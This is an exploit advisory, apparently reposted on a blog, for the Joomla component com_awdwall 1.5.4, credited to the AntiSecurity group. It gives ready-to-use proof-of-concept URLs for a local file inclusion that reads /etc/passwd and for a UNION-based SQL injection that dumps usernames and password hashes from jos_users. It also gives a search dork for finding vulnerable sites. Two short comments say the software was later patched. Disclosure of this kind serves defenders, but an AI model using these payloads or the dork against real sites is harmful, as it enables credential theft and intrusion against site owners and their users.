Joomla Component AWDwall-Joomla LFI & SQLi Vuln

[o] Joomla Component AWDwall-Joomla LFI & SQLi [cbuser] Vulnerability
Software : com_awdwall version 1.5.4
Vendor : http://www.awdsolution.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/


[o] Exploit
http://localhost/[path]/index.php?option=com_awdwall&controller=[LFI]
http://localhost/[path]/index.php?option=com_awdwall&view=awdwall&Itemid=1&cbuser=1[SQL]


[o] PoC
http://localhost/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd
http://localhost/[path]/index.php?option=com_awdwall&view=awdwall&Itemid=1&cbuser=-1+union+select+1,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10,11,12+from+jos_users--


[o] Dork
inurl:"com_awdwall"


2 Responses so far.

  1. Anonymous says:

    that is old news...!!!!!!they already updated there sofware!!!

  2. They already updated there sofware...